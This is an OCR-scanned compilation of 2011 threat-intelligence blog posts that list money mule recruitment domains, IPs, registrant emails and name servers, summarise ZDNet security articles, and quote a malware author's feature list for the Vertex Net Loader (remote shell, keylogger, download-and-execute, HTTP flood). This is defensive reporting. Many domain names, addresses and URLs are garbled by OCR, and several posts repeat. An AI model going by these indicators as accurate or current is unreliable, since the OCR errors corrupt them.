slows@5mx.ru 

soiarisgroupnet.net - 69.50.198.197 - Email: 
sharp@maillife. ru 

jvc-inc.com - 69.50.198.210 - Email: etude@qx8.ru 



jvcgroupnet.net - 69.50.198.221 - Email: 
spout@freenetbox. ru 

Name servers of notice, historical OSINT for the responding 
IPs provided: 

nsl.kalipsol9.cc - 208.110.80.34 - Email: 
tarts@freenetbox. ru 

ns2.kalipsol9.cc - 64.85.169.70 

ns3.kalipsol9.cc -173.208.132.42 

nsl.mamacholi.net - 208.110.80.35 - Email: 
excess@bigmaiibox. ru 

ns2.mamacholi.net - 64.85.169.71 

ns3.mamacholi.net -173.208.132.43 

nsl.rjevski.com - 208.110.80.34 - Email: 
io w@bigmaiibox. ru 
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ns2.rjevski.com - 64.85.169.70 

ns3.rjevski.com -173.208.132.42 

nsl.runiesrun.ee - 208.110.80.37 - Email: 
frost@bigmailbox. ru 

ns2.runlesrun.ee - 64.85.169.73 

ns3.runiesrun.ee -173.208.132.45 

nsl.skotinko.net - 208.110.80.38 - Email: 
in fo@dnregistrar ru 



ns2.skotinko.net - 64.85.169.74 

ns3.skotinko.net - 173.208.132.46 

nsl.solojumper.com - 208.110.80.36 - Email: 
crime@bigmaiibox. ru 

ns2.solojumper.com - 64.85.169.72 

ns3.solojumper.com - 173.208.132.44 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[ 1 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[2] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[4] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[5] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[6] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[7] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 


[8]Money Mule Recruiters on Yahooi's Web Hosting 



[9] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[10] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[llJKeeping Reshipping Mule Recruiters on a Short Leash 

[12] Keeping Money Mule Recruiters on a Short Leash 

[13] Standardizing the Money Mule Recruitment Process 

[14] inside a Money Laundering Group's Spamming 
Operations 

[15] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[16] Money Mules Syndicate Actively Recruiting Since 2002 
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A Peek Inside the Vertex Net Loader (2011-05-26 
16:34) 

It appears that the author of the of the DarkComet RAT has 
been keeping himself rather busy. 

In early-stage development (currently in BETA), the Vertex 
Net Loader is your typical web-based command 

and control malware loader, worth keeping an eye on. 

More details: 

Info on the loader: 

This is the small program that will send/retrieve info from/to 
the web panel, it is like the server part of a RAT. The loader 
is coded in C++. Size unpacked is lOOkb, compressed is 
very small and still stable. I choose C++ as the language for 
this project cause i code C+ + since a long time but i never 
release some security soft, so as a friend said it is a shame 
to have a knowledge in C++ and don't use it instead of 






Delphi all the time. Also C++ is faster and more stable than 
any other language. 

Features of the loader: 

- Send message box 

- Execute any kind of commands 

- close loader process 

- Download files and execute them 

- Get the process list 

- Get the modules list from PID 

- Set the keylogger status ON/OFF 

- Retrieve the keylogger logs 

- Read the file content and retrieve it 

- Uninstall the loader 

- Flttpflood same technologies as i used for DarkComet that 
is very powerful! 

- Remote shell 
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- Visit any webpage 

Upcoming features: 

- FWB 

- More commands 

- Panel Installer 

- More possibilities in the webpanel 

- User manager in the panel 

- Plugins support 

- and more. 
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Monitoring of Vertex Net Loader's development is ongoing. 

Related posts: 

[1] A Peek Inside a New DDoS Bot - "Snap" 

[2] Coding Spyware and Malware for Hire 

[3] Will Code Malware for Financial Incentives 

[4] E-crime and Socioeconomic Factors 









[5] Web Based Botnet Command and Control Kit 2.0 

[6] BlackEnergy DDoS Bot Web Based 
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A Peek Inside the Vertex Net Loader (2011-05-26 
16:34) 

It appears that the author of the of the DarkComet RAT has 
been keeping himself rather busy. 

In early-stage development (currently in BETA), the Vertex 
Net Loader is your typical web-based command 

and control malware loader, worth keeping an eye on. 

More details: 

Info on the loader: 

This is the small program that will send/retrieve info from/to 
the web panel, it is like the server part of a RAT. The loader 
is coded in C++. Size unpacked is lOOkb, compressed is 
very small and still stable. I choose C++ as the language for 
this project cause i code C+ + since a long time but i never 
release some security soft, so as a friend said it is a shame 
to have a knowledge in C++ and don't use it instead of 
Delphi all the time. Also C++ is faster and more stable than 
any other language. 


Features of the loader: 









- Send message box 

- Execute any kind of commands 

- close loader process 

- Download files and execute them 

- Get the process list 

- Get the modules list from PID 

- Set the keylogger status ON/OFF 

- Retrieve the keylogger logs 

- Read the file content and retrieve it 

- Uninstall the loader 

- FlttpfJood same technologies as i used for DarkComet that 
is very powerful! 

- Remote shell 
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- Visit any webpage 

Upcoming features: 

- FWB 

- More commands 


- Panel Installer 


- More possibilities in the webpanei 

- User manager in the panel 

- Plugins support 

- and more. 
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Monitoring of Vertex Net Loader's development is ongoing. 

Related posts: 

[1] A Peek Inside a New DDoS Bot - "Snap" 

[2] Coding Spyware and Malware for Hire 

[3] Will Code Malware for Financial Incentives 

[4] E-crime and Socioeconomic Factors 

[5] Web Based Botnet Command and Control Kit 2.0 

[6] BlackEnergy DDoS Bot Web Based 
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[7] A New DDoS Malware Kit in the Wild 

[8] The Cyber Bot - Web Based Malware 

[9] The Black Sun Bot - Web Based Malware 
[lOJCustom DDoS Capabilities Within a Malware 
[llJBotnet on Demand Service 

[12] Loads.cc - DDoS for Hire Service 

[13] Using Market Forces to Disrupt Botnets 

[14] Botnet Communication Platforms 

[15] A Botnet Master's To-Do List 

[16] DDoS on Demand VS DDoS Extortion 

[17] How Does a Botnet with 100k Infected PCs Look Like? 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Nine (2011-05-30 12:09) 

The following brief summarizes currently active money mule 
recruitment web sites, actively recruiting money mules for 
the processing of fraudulently obtained funds. 

Currently active sites residing within AS42708, PORTLANE 
Network www.portlane.com; AS29713, INTERPLEXINC 
Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, 
HETZNER-AS Hetzner Online: 

ATLANTALTD-UK.CC - 193.105.134.233 

ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: 
admin@atlanta-ltd-uk. net 

3ATLANTA-UK.COM 193.105.134.233 

BLITZNET-GROUPINC.CC - 78.46.105.205 - Email: 
admin@derwart-group.at 

5DALI-STYLE.COM - 98.141.220.117 

DALISTYLE-CROUP.CC - 98.141.220.118 - Email: 
tolls@mailti. com 

DER WOOD E-GROUP. COM 98.141.220.117 


DERWOODE-GROUP.NET 98.141.220.117 





CLACIS-CROUPLLC.COM 193.105.134.232 


lCLACISCROUP-LLC.NET - 193.105.134.233 

IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net 

ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira- 
de. com 

ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv-de.co 

IT-SERVICELTD.BE - 78.46.105.205 

KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade- 
group.com 

MASTERART-CROUP.COM 98.141.220.116 Email: 
east@maill3. com 

MENDRYLTD.COM - 98.141.220.117 - Email: 
admin@mendryitd. com 

MENZEL-GROUP.TV - 98.141.220.118 - Email: 
admin@devotion-company. com 

MITISSANSER VICE-CROUP-LTD. CC - 98.141.220.117 - 
Email: berra@cutemaii.org 

MITISSANSERVICECROUP-LTD.COM 98.141.220.117 - 
Email: alibi@mailae.com 
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oregonltd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru 

PARLEN-CROUPLLC.COM - 98.141.220.118 - Email: 
admin@parien-groupiic. com 



PARLENCROUPLLC.NET 98.141.220.114 


PARLEN-GROUP-USA.COM 98.141.220.118 

quad-groupuk.cc - 86.55.210.6 - Email: prissy@mailae.com 

QUAD-CROUPUK.CC - 86.55.210.6 - Email: 
prissy@maiiae. com 

QUAD-IT-GROUP.COM - 193.105.134.232 - Email: 
admin@quad-it-group. com 

QUINTAGROUP.CC - 98.141.220.117 - Email: 
co\a@mai\ae. com 

QUINTA-GROUPUS.COM - 98.141.220.118 Email: 
admin@quinta-groupus. com 

QUINTA-LLC.NET 98.141.220.118 - Email: admin@quinta- 
llc.net 

REXTECHINNOVATION.COM - 98.141.220.118 - Email: 
admin@rextech innovation, com 

REXTECHLTD.CC - 98.141.220.115 - Email: blurt@fxmail.net 

REXTECHLTD-US.COM - 98.141.220.118 - Email: 
admin@rextechltd-us. com 

SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: 
admin@special-art-ltd. com 

SPECIAL-ART-UK.CC - 193.105.134.234 

SUBLIME-LTD.NET - 98.141.220.118 - Email: 
admin@sublime-ltd. net 



TARGETMARKETGROUP-LLC.CC - 98.141.220.117 - Email: 
admin@targetmarketgroup-llc. cc 

TAZPROGLTD-US.COM - 98.141.220.117 - Email: 
admin@tazprogitd-us. co 

VNSPROJECT-DE.CC - 78.46.105.205 - Email: 
admin@ vnsproject-de. cc 

VORTEXLLC-UK.COM - 193.105.134.232 - Email: 
admin@ vortexllc-uk. com 

VORTEX-LLC-UK.NET - 193.105.134.230 - Email: 
admin@ vortex-llc-uk. net 
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Name servers of notice: 

NS1.NAMESUKNS.CC -178.162.172.48 - Email: pal@bz3.ru 

NS2.NAMESUKNS.CC - 69.10.56.131 

NS3.NAMESUKNS.CC - 66.199.229.123 

NS1. NAME UK. AT -178.162.172.57 - Email: 
admin@nameuk.at 

NS2. NAME UK. AT - 69.10.56.132 

NS3.NAMEUK.AT - 66.199.229.124 

NS1. UKDNSTART.NET -178.162.172.40 - Email: 
admin@ukdnstart. net 

NS2.UKDNSTART.NET 69.10.56.130 


NS3.UKDNSTART.NET 66.199.229.122 


NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: Iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 

NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

Monitoring of money mule recruitment campaigns is 
ongoing. 

Related posts: 

[ 1 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSINT 

[2] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[3] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 



[5] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[7] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[9] Money Mule Recruiters on Yahoo!'s Web Hosting 

[lOJDissecting an Ongoing Money Mule Recruitment 
Campaign 

[11 ]Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 

[15] lnside a Money Laundering Group's Spamming 
Operations 

[16] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho 
Danchev's blog. 



1. http://ddanchev.blo as oot.com/2011/05/keeoina-mone v- 
mule-recruiters-on-short_25.html 

2. htto.V/ddanchev.blo as oot.com/2011/05/keeoina-mone v- 
mule-recruiters-on-short. html 

3. htto://ddanchev.blo as oot.com/2011/03/keeoina-mone v- 
mule-recruiters-on-short. html 

4. http://ddanchev.blo as pot.com/2011/01/keepina-mone v- 
mule-recruiters-on-short. html 

5. htto://ddanchev.blo as oot.com/2010/04/dns-infrastructure- 
of-monev-mule.html 

6. htto://ddanchev.blo as oot.com/2010/04/keeoina-mone v- 
m ule-recruiters-on -short, h tml 

7. htto://ddanchev.blo as oot.com/2010/03/monev-mule- 
recruitment-caniDaian-servina.html 

8. htto://ddanchev.blo as oot.com/2010/03/keeoina-mone v- 
mule-recruiters-on-short.html 

9. htto://ddanchev.blo as oot.com/2010/03/monev-mule- 
recruiters-on-vahoos-web. html 

10. htto.V/ddanchev.blo as oot. com/2010/02/dissectin a- 
on aoina-monev-mule.html 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Nine (2011-05-30 12:09) 

The following brief summarizes currently active money mule 
recruitment web sites, actively recruiting money mules for 
the processing of fraudulently obtained funds. 

Currently active sites residing within AS42708, PORTLANE 
Network www.portlane.com; AS29713, INTERPLEXINC 
Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, 
HETZNER-AS Hetzner Online: 

ATLANTALTD-UK.CC - 193.105.134.233 

ATLANTA-LTD-UK.NET - 78.46.105.205 - Email: 
admin@atlanta-ltd-uk. net 

3ATLANTA-UK.COM -193.105.134.233 

























BLITZNET-GROUPINC. CC 78.46.105.205 Email: 
admin@derwart-group.at 

5DAU-STYLE.COM - 98.141.220.117 

DAUSTYLE-GROUP.CC - 98.141.220.118 - Email: 
tolls@mailti. com 

DERWOODE-GROUP.COM - 98.141.220.117 

DERWOODE-GROUP.NET 98.141.220.117 

GLACIS-GROUPLLC.COM 193.105.134.232 

lGLACISGROUP-LLC.NET - 193.105.134.233 

IT-AMIRA.NET - 86.55.210.3 - Email: support@it-amira.net 

ITAMIRA-DE.COM - 86.55.210.6 - Email: admin@itamira- 
de. com 

ITSERV-DE.CO - 78.46.105.205 - Email: admin@itserv-de.co 

IT-SERVICELTD.BE - 78.46.105.205 

KADE-GROUP.COM - 86.55.210.4 - Email: admin@kade- 
group.com 

MASTERART-GROUP.COM 98.141.220.116 - Email: 
east@maill3. com 

MENDRYLTD.COM - 98.141.220.117 - Email: 
admin@mendryitd. com 

MENZEL-GROUP.TV - 98.141.220.118 - Email: 
admin@devotion-company. com 



MITISSANSER VICE-GROUP-LTD. CC - 98.141.220.117 - 
Email: berra@cutemaii.org 

MITISSANSERVICEGROUP-LTD.COM 98.141.220.117 - 
Email: alibi@mailae.com 
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oregonltd-uk.cc - 86.55.210.5 - Email: cause@ca4.ru 

PARLEN-GROUPLLC.COM - 98.141.220.118 - Email: 
admin@parlen-groupllc. com 

PARLENGROUPLLC.NET 98.141.220.114 

PARLEN-GROUP-USA.COM 98.141.220.118 

quad-groupuk.cc - 86.55.210.6 - Email: prissy@mailae.com 

QUAD-GROUPUK.CC - 86.55.210.6 - Email: 
prissy@mailae. com 

QUAD-IT-GROUP.COM - 193.105.134.232 - Email: 
admin@quad-it-group. com 

QUINTAGROUP.CC - 98.141.220.117 - Email: 
coia@maiiae. com 

QUINTA-GROUPUS.COM - 98.141.220.118 Email: 
admin@quinta-groupus. com 

QUINTA-LLC.NET 98.141.220.118 - Email: admin@quinta- 
llc.net 

REXTECHINNOVATION.COM - 98.141.220.118 - Email: 
admin@rextech innovation, com 


REXTECHLTD.CC - 98.141.220.115 - Email: blurt@fxmail.net 



REXTECHLTD-US.COM - 98.141.220.118 - Email: 
admin@rextechltd-us. com 

SPECIAL-ART-LTD.COM - 193.105.134.233 - Email: 
admin@speciai-art-ltd. com 

SPECIAL-ART-UK.CC - 193.105.134.234 

SUBLIME-LTD.NET - 98.141.220.118 - Email: 
admin@sublime-ltd. net 

TARCETMARKETCROUP-LLC.CC - 98.141.220.117 - Email: 
admin@targetmarketgroup-llc. cc 

TAZPROCLTD-US.COM - 98.141.220.117 - Email: 
admin@tazprogitd-us. co 

VNSPROJECT-DE.CC - 78.46.105.205 - Email: 
admin@ vnsproject-de. cc 

VORTEXLLC-UK.COM - 193.105.134.232 - Email: 
admin@ vortexiic-uk. com 

VORTEX-LLC-UK.NET - 193.105.134.230 - Email: 
admin@ vortex-llc-uk. net 
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Name servers of notice: 

NS1.NAMESUKNS.CC -178.162.172.48 - Email: pal@bz3.ru 

NS2.NAMESUKNS.CC - 69.10.56.131 


NS3.NAMESUKNS.CC - 66.199.229.123 


NS1. NAME UK. AT -178.162.172.57 - Email: 
admin@nameuk.at 

NS2.NAMEUK.AT 69.10.56.132 

NS3.NAMEUK.AT 66.199.229.124 

NS1. UKDNSTART.NET -178.162.172.40- Email: 
admin@ukdnstart. net 

NS2.UKDNSTART.NET 69.10.56.130 

NS3.UKDNSTART.NET 66.199.229.122 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: Iavier@bz3. 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 

NS2.USDENNS.SU - 84.19.161.7 

NS3.USDENNS.SU - 84.19.161.10 

Monitoring of money mule recruitment campaigns is 
ongoing. 
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Summarizing ZDNet's Zero Day Posts for May (2011- 
06-08 16:24) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for May You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 
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Recommended reading: 

• [3] China's Blue Army: When nations harness hacktivists 
for information warfare 

01. [4]Vishing attack on Skype pushing scareware 

02. [5]Commtouch: 71 percent increase in new zombies 

03. [6]0sama execution video scam spreading on Facebook 

04. [7]New MAC OS X scareware delivered through blackhat 
SEO 

05. [8]'You visit illegal websites’ FBI-themed emails lead to 
scareware 

06. [9]Fake Microsoft Patch Tuesday emails lead to ZeuS 
crime ware 

07. [10]'Enable Dislike Button' scam spreading on Facebook 

08. [11 ]NASA's Goddard Space Flight Center FTP server 
hacked 

09. [12]'Checkout Your PROFILE Stalkers' scam spreading on 
Facebook 


10. [13]'The World Funniest Condom Commercial - LOL' 
scam spreading on Facebook 

11. [14]China's Blue Army: When nations harness hacktivists 
for information warfare 

This post has been reproduced from [15]Dancho 
Danchev's blog. Follow him [16]on Twitter. 

1. http://www.zdnet.com/topics/dancho+danchev? 
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when-nations-harness-hacktivists-for-information-warf 

are-/8686 
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10. htto://www. zdnet. com/bloa/securitv/enable-dislike- 
button-scam-spreadina-on-facebook/8655 

11. htto://www.zdnet. com/bloa/securitv/nasas-aoddard- 
s pace-fliaht-center-ftp-server-hacked/8660 

12. http://www.zdnet. com/bloa/securitv/checkout-vour- 
profile-stalkers-scam-spreadina-on-facebook/8665 

13. http://www. zdnet. com/bloa/securitv/the- world-funniest- 
condom-commercial-lol-scam-spreadina-on-facebook/86 
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14. http.V/www.zdnet.com/bloa/securitv/chinas-blue-arm v- 
when-nations-harness-hacktivists-for-information-warf 

are-/8686 
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Summarizing ZD Net's Zero Day Posts for June (2011- 
07-07 12:24) 




































The following is a brief summary of all of my posts at 
ZDNet's Zero Day for June. You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3]'Hot Lesbian Video - Rihanna and Hayden Panettiere' 
scam on Facebook leads to Mac malware 

02. [4]5ony Europe hacked by Lebanese grey hat hacker 

03. [5]5pamvertised United Parcel Service emails lead to 
sea re ware 

04. [6]The most common iPhone passcodes 

05. [7]AutoRun malware infections declining 

06. [8]'McDonald's Free Dinner Day' emails lead to 
sea re ware 

07. [9]Two DDoS attacks hit Network Solutions 
793 

08. [lOJ'The Creator of LulzSec arrested in London' scam 
spreading on Facebook 

09. [11 ]Federal Reserve themed emails lead to ZeuS 
crime ware 

10. [12]'Photographer commited SUICIDE 3 days after 
shooting THIS video!' scam spreading on Facebook 

This post has been reproduced from [13]Dancho 
Danchev's blog. Follow him [14]on Twitter. 

1. http:7/www.zdnet.com/topics/dancho+danchev? 
o=l&mode=rss&ta a =mantle skin:content 
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5. http://www.zdnet.com/bloa/securit v/s pamvertised-united- 
parcel-service-emaiis-lead-to-scareware/8745 

6. http://www.zdnet.com/bloa/securitv/the-most-common- 
i ehone-easscodes/8760 

7. http://www.zdnet.com/bloa/securitv/autorun-malware- 
infections-declinina/8772 

8. http://www.zdnet.com/bloa/securitv/mcdonalds-free- 
dinner-dav-emails-lead-to-scareware/8848 

9. htto://www.zdnet.com/bloa/securitv/two-ddos-attacl<s-hit- 
network-soiutions/8852 

10. http://www.zdnet.com/bloa/securitv/the-creator-of- 
lulzsec-arrested-in-london-scam-soreadina-on-facebook/8 
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11. http://www.zdnet. com/bloa/securitv/federal-reserve- 
themed-emails-lead-to-zeus-crimeware/8862 

12. http://www.zdnet. com/bloa/securit v/ photo ara pher- 
commited-suicide-3-davs-after-shootina-this-video-scam-s p 

readina-on-facebool</8911 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Ten (2011-07-07 13:25) 

The following intelligence brief is part of the [ 1 ] Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Currently active money mule recruitment domains: 

ACWOODE-GROUP.COM - 184.168.64.173 - Email: 
admin@acwoode-group. com 

ACWOODE-GROUP.NET - 184.168.64.173 - Email: 
admin@acwoode-group. net 

ART-GROUPINTEGRETED.COM 78.46.105.205 Email: 
admin@art-groupinteg reted. com 

ARTINTEGRATED-GROUP.NET 78.46.105.205 - Email: 
crony@cutemaii. org 

COMPLETE-ART-GROUP-LTD.COM - 193.105.134.233 - 
Email: saps@cutemaii.org 

COMPLETE-ART-UK.NET - 193.105.134.232 - Email: 
admin@comp\ete-art-uk. net 





CONDORLLC-UK.COM - 193.105.134.231 - Email: 
plods@fxmail. net 

CONDOR-LLC-UK.NET - 193.105.134.233 - Email: 
admin@condor-llc-uk. net 

CONTEMP-USAINC.COM - 184.168.64.173 - Email: 
admin@contemp-usainc. com 

CONTEMP-USCROUP.COM -184.168.64.173 - Email: 
admin@contemp-usgroup. com 

DE-KADEGROUP.CC - 193.105.134.230 - Email: 
cents@mailae. com 

DER WOOD E-GROUP. CC - 98.141.220.115 - Email: 
web@derwoode-group. cc 

ELENTY-CO.NET -184.168.64.173 - Email: abcs@mailti.com 

ELENTY-LLC.COM -184.168.64.173 - Email: admin@elenty- 
llc. com 

GAPSONART.NET - 184.168.64.173 - Email: 
admin@gapsonart. net 

GLACIS-GROUPUK.NET 78.46.105.205 Email: 
admin@glacis-groupuk. net 

GURU-GROUP.CC -184.168.64.173 - Email: admin@guru- 
group.cc 

GURU-GROUP.NET 184.168.64.173 - Email: 
jj@cutemail. org 

INTECHTODEX-GROUP.COM - 184.168.64.173 - Email: 
uq@maill3. com 



INTEGRATED-EUROPE-IT.NET 78.46.105.205 Email: 
admin@integrated-europe-it.net 
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ITAGROUP-USA.NET - 98.141.220.117 - Email: 
admin@itagroup-usa. net 

IT-ANALISYS. COM - 98.141.220.115 - Email: 
yea@maiiae. com 

ITANALYSISGROUP.NET -98.141.220.116 - Email: 
admin@itanalysisgroup. net 

KADE-GROUPDE.NET - 78.46.105.205 - Email: 
zigzag@fxmail. net 

MASTERARTUSA.COM - 98.141.220.114 - Email: 
day@mai\ae. com 

NARTEN-ART.COM - 209.190.4.91 - Email: 
glamor@fxmail. net 

NARTENART.NET 209.190.4.91 - Email: 
admin@nartenart. net 

quad-groupuk.cc - 78.46.105.205 - Email: 
prissy@mailae. com 

REFINEMENT-ANTIQUE.COM 184.168.64.173 - Email: 
xe@fxmail.net 

SCAR-BEUNC.COM -184.168.64.173 - Email: admin@scar- 
beiinc.com 

SKYLINE-ANTIQUE.COM - 209.190.4.91 - Email: 
blurs@mailae. com 



SKYLINE-LTD.NET 209.190.4.91 - Email: admin@skyline- 
ltd.net 

SMARTLLC-UK.COM - 193.105.134.234 - Email: 
admin@smartllc-ul<. com 

SMART-LLC-UK.NET 193.105.134.233 - Email: 
pol@mailae. com 

SPECIAL-ARTUK.COM - 193.105.134.232 - Email: 
admin@special-artuk. com 

SUBLIMELTD.COM - 98.141.220.118 - Email: 
admin@sublimeltd. com 

TODEX-GROUP.NET - 184.168.64.173 - Email: 
admin@todex-group. net 
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The domains reside within the following ASs: AS10297, 
RoadRunner RR-RC; AS42708; PORTLANE Network; AS26496; 

GODADDY.com; AS29713, INTERPLEXINC; AS24940, 
HETZNER-AS Hetzner Online. 

Name servers of notice: 

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.ru 
NS2.MKNS.SU - 46.4.148.119 
NS3.MKNS.SU - 184.82.158.76 

NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru 

NS2.MLDNS.SU - 46.4.148.74 


NS3.MLDNS.SU - 184.82.158.74 


NS1.MNAMEDL.SU - 85.25.250.211 - Email: 
mnamed@yourisp. ru 

NS2.MNAMEDL.SU 46.4.148.118 

NS3.MNAMEDL.SU 184.82.158.75 

NS1.DNSUS.SU - 217.23.15.137 - Email: wifi@yourisp.ru 

NS2.DNSUS.SU - 87.118.81.7 
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NS3.DNSUS.SU - 87.118.81.10 

NS1.NAMEUSNS.SU - 217.23.15.138 - Email: iavier@bz3.ru 

NS2.NAMEUSNS.SU - 84.19.161.7 

NS3.NAMEUSNS.SU - 84.19.161.10 

NS1.USDENNS.SU - 217.23.15.136 - Email: lipstick@free- 
id.ru 

NS2.USDENNS.SU - 84.19.161.7 
NS3.USDENNS.SU - 84.19.161.10 
NS1.NAMESUKNS.CC - 86.55.210.4 - Email: pal@bz3.ru 
NS2.NAMESUKNS.CC - 193.105.134.232 
NS3.NAMESUKNS.CC - 193.105.134.237 
NS1.NAMEUK.AT - 86.55.210.5 - Email: admin@nameuk.at 
NS2.NAMEUK.AT 193.105.134.233 



NS3.NAMEUK.AT 193.105.134.236 


NS1.UKDNSTART.NET -86.55.210.5 - Email: 
admin@ukdnstart. net 

NS2.UKDNSTART.NET 193.105.134.233 

NS3.UKDNSTART.NET 193.105.134.236 

NSl.DENDRUYOS.NET 86.55.210.4 - Email: 
admin@dendruyos. net 

NS2.DENDRUYOS.NET 193.105.134.232 

NS3.DENDRUYOS.NET 193.105.134.237 

NS1.DEDNSAUTH.NET - 86.55.210.2 - Email: 
admin@dednsauth.net 

NS2.DEDNSAUTH.NET - 193.105.134.230 

NS3.DEDNSAUTH.NET - 193.105.134.239 

NS1.DELTOPOOR.AT - 86.55.210.3 - Email: 
admin@deitopoor.at 

NS2.DELTOPOOR.AT - 193.105.134.231 

NS3.DELTOPOOR.AT - 193.105.134.238 

Monitoring of ongoing money mule recruitment campaigns 
ongoing. 

Related posts: 

[2]Keeping Money Mule Recruiters on a Short Leash - Part 
Nine 



[3] Keeping Money Mule Recruiters on a Short Leash - Part 
Eight - Historical OSiNT 

[4] Keeping Money Mule Recruiters on a Short Leash - Part 
Seven 

[5] Keeping Money Mule Recruiters on a Short Leash - Part Six 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[7] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[9] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[lOJKeeping Money Mule Recruiters on a Short Leash - Part 
Three 

[HJMoney Mule Recruiters on Yahoo!'s Web Hosting 

[12] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[13] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[14] Keeping Reshipping Mule Recruiters on a Short Leash 

[15] Keeping Money Mule Recruiters on a Short Leash 

[16] Standardizing the Money Mule Recruitment Process 



[17] lnside a Money Laundering Group's Spamming 
Operations 

[18] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[19] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [20]Dancho 
Danchev's blog. 
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recruiters-use-asproxs-fast.html 
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20. htto.V/ddanchev.blo as oot.com/ 

799 


























































Keeping Money Mule Recruiters on a Short Leash - 
Part Ten (2011-07-07 13:25) 

The following intelligence brief is part of the [ 1 ] Keeping 
Money Mule Recruiters on a Short Leash series. In it, 

I'll expose currently active money mule recruitment domains, 
their domain registration details, currently responding 

IPs, and related ASs. 

Currently active money mule recruitment domains: 

ACWOODE-CROUP.COM - 184.168.64.173 - Email: 
admin@acwoode-group. com 

ACWOODE-CROUP.NET - 184.168.64.173 - Email: 
admin@acwoode-group. net 

ART-CROUPINTECRETED.COM 78.46.105.205 Email: 
ad mi n@art-g rou pinteg reted. com 

ARTINTECRATED-CROUP.NET - 78.46.105.205 - Email: 
crony@cutemail. org 

COMPLETE-ART-CROUP-LTD.COM - 193.105.134.233 - 
Email: saps@cutemaii. org 

COMPLETE-ART-UK.NET - 193.105.134.232 - Email: 
admin@compiete-art-uk. net 

CONDORLLC-UK.COM - 193.105.134.231 - Email: 
plods@fxmail. net 

CONDOR-LLC-UK.NET 193.105 134.233 - Email: 
admin@condor-Hc-ui<. net 

CONTEMP-USAINC.COM - 184.168.64.173 - Email: 
admin@contemp-usainc. com 



CONTEMP-USGROUP.COM -184.168.64.173 - Email: 
admin@contemp-usgroup. com 

DE-KADEGROUP.CC - 193.105.134.230 - Email: 
cents@mailae. com 

DER WOOD E-GROUP. CC - 98.141.220.115 - Email: 
web@derwoode-group. cc 

ELENTY-CO.NET -184.168.64.173 - Email: abcs@mailti.com 

ELENTY-LLC.COM -184.168.64.173 - Email: admin@elenty- 
llc. com 

GAPSONART.NET - 184.168.64.173 - Email: 
admin@gapsonart. net 

GLACIS-GROUPUK.NET 78.46.105.205 - Email: 
admin@giacis-groupuk. net 

GURU-GROUP.CC -184.168.64.173 - Email: admin@guru- 
group.cc 

GURU-GROUP.NET 184.168.64.173 - Email: 
jj@cutemaii. org 

INTECHTODEX-GROUP.COM - 184.168.64.173 - Email: 
uq@maill3. com 

